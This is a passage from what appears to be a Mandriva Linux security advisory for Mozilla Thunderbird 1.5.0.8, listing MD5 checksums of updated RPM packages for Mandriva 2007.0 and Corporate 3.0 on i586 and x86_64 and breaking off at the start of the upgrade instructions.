 2563050985477697472069d08e96de0f  2007.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.i586.rpm
 e22be985ae58ab3eba5b90aa6a3eb58e  2007.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.i586.rpm
 fde0d1b9c4feee3c1e239345f4065090  2007.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.i586.rpm
 10be2386887a6c70bc4f9c0453b33072  2007.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 1c92d5ee79fc52ec1525f3c96dfa1916  2007.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 42e6ddb4a33a297c71b996bf651a4d69  2007.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.i586.rpm
 96394d1245284a886b954bb063c0ab5b  2007.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 8386317130e064260bd8b114616410ed  2007.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 eb622e8adc0767e090a608e80a1611b7  2007.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 3ca6736aaf725851a0be21f0490aeb20  2007.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 47b16b8c45acc936b62051594ed87c69  2007.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 c2e742162882c52761040025ff4ddfff  2007.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 072c5224bd49a45ba7ab0a57f657ec6e  2007.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.i586.rpm
 3393e810730d305adc4fe8ecc98b782a  2007.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 70882501b0fc01a56cee67c2b7c63ac5  2007.0/i586/nsinstall-1.5.0.8-1.1mdv2007.0.i586.rpm 
 e408368ca02e7efbbece9adbaaea7d56  2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
 7867a124b85e4a8098ec7b814267c1f5  2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
 e776e0c4c5a6ff592af0c346bf8b4511  2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 47aa8c7af46ee44f1b51e0f44772beeb  2007.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e284b46733e04ab96cccb612de04e5a8  2007.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e73efd093c48aa82d6f73025f1ade443  2007.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ed790bdd1a45343b427925765f5f2b5c  2007.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 61690a97ef04b6083693ffe4a9ab3176  2007.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 889574eda89385739aad6eda7f3d2604  2007.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ef9b59cdd619da74737b5e91e4067386  2007.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e20a88ece32f8ee81aaedd828558d880  2007.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 250f6f86984922da278774d480ba37a7  2007.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 f683dba38c9055cbac36f8468e357ebf  2007.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6594d0bb3f7770f168728827c1cf9f83  2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1ee011c3c94c7b081f53b9a55996da0c  2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be24dd32e628b8294c1b87d200cf02dd  2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 020acf8e510080a701c6278c6eb862ae  2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 af4c92e4f3eaf833111572ead14c8c04  2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7483c3a55198fcbc9be2c9750919a370  2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 753acdb58e6400659dab48ff78f371e7  2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 fb83f542bd12edda5e85d9873a08a938  2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 996bbfb13654cfc2180036ea6b1e61df  2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ff6217b99ab96a1444b6a758bf184ecf  2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 f15d9f053011068deba71fdc05dc6d46  2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 98f63b0dedef781ec16f8bebb6a032cb  2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e5e42bb849d26a4f59fb6204d6ed9850  2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8bc9d56d4778baf40b115eb805a506b3  2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 21c7d7ffd14a724e4ce9d96e99d0f3c7  2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9b115831c8ae36d7141c93a9d867d445  2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 d6efb3cdaba13c17dd31147011796614  2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 4239765036a0bffaa4fcff9fb076a221  2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be87cc456600cb0dc18730ae3f75af92  2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 459367e42865a1de4374d2a9b8c36232  2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1e1b30720806b2c6ab650251f9756127  2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 70c5525bea63d291374706abfb4523c4  2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 4addf81f6fdb0fe55d2274ba726d066e  2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9c9a1e6a7623a712f40666e77fd3f2b4  2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9cd9d0509bbe4d0bc7c092118253c237  2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 b23236fc11caa38b1354893f1e9863e1  2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 c5b898d7f04c26a34bb4223ee4547586  2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8e114fec014131d472790035a1509783  2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 3eda3b36a83c550a1f52faf6adfb0b10  2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 c336cc525567465d1649ee55c604d3a3  2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 476f974ea2e3b9ef971231b8b08e62f0  2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7878332de8134b9025b924315d6ffbf6  2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7602f9099c26d60e934f54918dd38e46  2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 52ba4b91175db4376fd4c4e9018969c3  2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1e2bc31ee83c5c47f06953aba976a27d  2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 47b180beb65802e89f7e6a8be7f33d15  2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6485a71b5d07fef3e337630aa53bb4c6  2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6b5df9cad533fc75fc47191df5f3dabf  2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 99b61d660a72eff639f78ec0422aeaf2  2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 99cfe247978fe85b5b5186bf12247f3a  2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8c393629997cea717c2f1e8d077a9344  2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be518e4b4833e6cb9d083871101be35b  2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8dedff0ffd0e7b7721b256f01821f188  2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 05202d61506a60981fb9a317ce6a5d5d  2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 0deda88ec857fb0c11b57555814a20ec  2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 0f2f7928b2edfbe0ae5faf127b0ed066  2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm 
 e408368ca02e7efbbece9adbaaea7d56  2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
 7867a124b85e4a8098ec7b814267c1f5  2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
 e776e0c4c5a6ff592af0c346bf8b4511  2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm

 Corporate 3.0:
 71192ef0a8bd28533718191d287d8158  corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
 c0121a4a0192d7944b1f8d30c977ab38  corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
 53c403f48cb8547f0eb646ab1b41b656  corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
 032ebcc12942292620b05929e0583f3a  corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
 c88d6e26aa75dab433abcf71f2962e5c  corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
 dcc54cb45829470f4267806696b46eca  corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
 e7ba899422d7cbfd343659b810e4ee52  corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
 d987b44bd201c2a23b404751e13df538  corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
 9d496fa524a5226676f56ed87d2015ec  corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
 eac64993c47963ede70eca5fb62e30b9  corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
 b5523fcbf2370d1805e1f917faaa31c8  corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
 1eb806fe5a429b52f010e16aeed4cb4a  corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
 1a8da00f3e4033ec813df4548072ac9f  corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
 3a2434c868a3b5799cb69c31d43f900c  corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
 a1bb48121d53f83bf0efd303ea477b71  corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
 6f9d308c194ae42cfa0787afdebff2cc  corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
 bb3c3cf4056814131f8031471c81ac6f  corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
 4228aaf098c501a80af97469393482b5  corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
 3a95ad54416e2f002d1aaa32557cf947  corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
 19e1eac0351d89760ee31b4c9ee4fcc4  corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
 1c21de0415bd0223237aa82795cc9600  corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
 a11487e4145c294a57a77491f6996748  corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
 31064002ac59d4857c3c45c3161580dc  corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
 fc88eeba422b084ffa67b77211248ef0  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
 4ead83e3405e7469370b4f02a9254ddc  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
 3a15b707a6d7f8e9b25c1ccaea023333  corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
 1a8c565fd3b42069b2e42103d98dfab2  corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
 0040d479d7e55304c06df39b2233d12e  corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
 6fab1321b377748e22a6709b772d5159  corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
 1969ec5d6cc27df2f09f9733b5b37c6d  corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
 0c34a8e8bd3f9011283fe990771a857a  corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
 68781ca20e2232457046bdab86b59462  corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
 37c3909b8feb9a35208519ccf4ec8a46  corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
 ea2febd0e93d9348fd580452f7adc0be  corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
 2eac2aaeb4fe209f98aa85505f6a9b87  corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
 d8d8fc30075f0848859cbe96b26404a7  corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
 3af19a8b01fb316451132e6460c7deb0  corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
 f7aed893e50dff94f47d658d70093824  corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
 ab6ead860edf6de4935aa3bb4ecf4721  corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
 a9b0bc2b2bcf186b5a284cba3d6cad19  corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
 373554b2032c20a61c48f4a4e11e5b57  corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
 1a2efc51627d9f55929e1b33e20f5274  corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
 27ab1d70b317c477b56df8223a8477b4  corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
 0bcd50b34bec84016747f4919b43b8e1  corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
 4b26e1653ccf78604c16b25ed7357dfb  corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
 ea1a0d0349f9a2f26b23c7678d7e5736  corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
 7d7c13e7a820c069b3c657adf57443d9  corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
 ef0755e523de702c802890f494ee5ea0  corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
 f7618d53bff6c0764297f2352c5d0239  corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
 8df8db645153b5f7539044d5f892ad54  corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
 d26cb2fbb5301bcf127ea4e4606f52b9  corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
 f57d3dd11471a798542b87f0a3c68e82  corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
 f3aede5440aeb78b59350fe56bb221d2  corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
 bda7588d80565c17190fb407bdc3b1b2  corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
 5f0764d5685d0836bd718fdc86b8a73a  corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
 2a1892c7e027dba761df43c98bb5e85f  corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm 
 04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
 98c5a4c000178cf57677fa6ee70adb71  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 124ecce0dd9a26b565eef6c2f7e14401  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c109965ada094232d0958a8121be977a  corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
 e50d4054e85e4624b285067c75cfab18  corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
 f8cc5e4a36961ef4db2b8632fc6734d9  corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
 70e0a1878ce810ee835e7eca08a11e12  corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
 50abb11664ca02e6d77cbf30396e5398  corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
 5565876286c51872fb0ff90df059f052  corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
 cdd3892a5ba2a7c1ffe29d009e9d23a9  corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ba3e7a92e79e00cd74b722ab94d832eb  corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
 c11927081645df376c72f27e8ebc6a85  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
 448172b7c753b48c81b2a2c5d337b9e5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
 b83c0eb2158672f087fd5754ca27efad  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
 49b91f3eae7a0773ecce62f635a6dfe9  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
 3a0cf5325721e29c4eba9ee7cbc7efb7  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
 cadf1aff1e915adb9e14539eb04521db  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
 8218118b837bf05b3603652f0d4c5690  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 7c7190fc9ec1fc5774436ec7b0c92fd5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
 a42f63c64470ba933d6239bdf8b1569c  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 af8c5d7e3569278f3e9d364362be25b3  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 c749a5b7ac03ad98919f83425fcbd4c2  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ac82cd1f4fc0c5ed57be5b165cc65be4  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
 0fbd67977bdfc1b1f9aa3c846c80c244  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4d26f0c7b32d3888e1e5c4c14516a4df  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 37fbc8358f1f11d5cb9f0e9b2fab3b26  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 6bec775a601e84be547246ae5638d059  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
 0dc1c40ef6d1a233661048447db25543  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 7ec948cc8df84aae6b3d660bd4187208  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4b7ba48ffeff51709b26c8f315a4aaa1  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 94fceae9b7bc6d48fe2677eecaaf11a6  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d578499c38c981f2b8cc55fc1351efef  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
 095291274be4a418d05c4e96cb441d90  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 272b554e86966e103d3e7f42b5cba9db  corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
 52bd52c4d5eaad6fa541dd20db5411d0  corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 2536b28aa209a912ff74601db4e685b4  corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 484ad35799b9a8cd277754bf1b13d686  corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
 42ff5a3a8320c4be3ffb1f1d74912f78  corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 8a46a1d9f9380c205699ce090d749ff2  corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
 3c30c5aeee783bfabe34fb1ff7357d38  corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 a90b14f77d6eed2228bfa55457803f6f  corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
 719239492f7d93b04f2c95902fccf94c  corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 f52bcdf19f10745e756f0d58616126df  corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
 79826e403152cbe90ddf3bd4d8d64abe  corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
 18c08993c8f43c976be6cf2e8cfb2c35  corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
 b17866029fe4244a77af59fbb55a07b9  corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
 878f59fdb3ebb5929fc23437a17fb5ad  corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d62fb25dc173e8b12be8623ae8fbf9bf  corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
 266322718c7cedd78e89524940f15d55  corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 32c5fcab859aff66aaf704b997a1c625  corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 17d7eeb0fbd25df1f76d5fa875ef7a3d  corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4aabd47a35cb15547ccbe4eda1b521e8  corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 1d8d27be2902605b0eae9dcbd89654cc  corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
 6c116048a69b3c176831fde5ff0a252a  corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 e5bcb8518c5a61e63e62f90c363c67ae  corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 5569afdd940d28bdf37a1003d5d5d6b0  corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d00245da432be7a7d268846891555930  corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ee130a70f9b1fe5719fea63963f3db6d  corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 81f41bebeb9eca34d7c27ab81ca41af6  corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm 
 04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
 98c5a4c000178cf57677fa6ee70adb71  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 124ecce0dd9a26b565eef6c2f7e14401  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
